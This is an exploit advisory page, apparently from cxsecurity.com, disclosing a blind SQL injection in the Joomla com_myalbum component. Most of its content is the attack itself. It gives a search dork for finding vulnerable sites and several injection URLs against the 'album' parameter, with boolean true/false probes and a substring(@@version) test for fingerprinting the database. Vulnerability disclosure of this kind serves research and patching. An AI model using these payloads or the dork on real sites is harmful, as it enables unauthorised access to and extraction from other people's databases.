Joomla Component com_myalbum Blind Injection Vulnerability

2013.05.12
Credit: AtT4CKxT3rR0r1ST
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:\"com_myalbum\"

Joomla Component com_myalbum Blind Injection Vulnerability ============================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Dork : inurl:"com_myalbum" .:. Script : http://joomlacode.org/gf/project/myalbum/ #################################################################### ===[ Exploit ]=== Blind Injection: ================ www.site.com/index.php?option=com_myalbum&album=1[injection] www.site.com/index.php?option=com_myalbum&album=1+and+1=1 >>> True www.site.com/index.php?option=com_myalbum&album=1+and+1=2 >>> False www.site.com/index.php?option=com_myalbum&album=1+and+substring(@@version,1,1)=5 >>> True www.site.com/index.php?option=com_myalbum&album=1+and+substring(@@version,1,1)=4 >>> False

References:

http://joomlacode.org/gf/project/myalbum/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top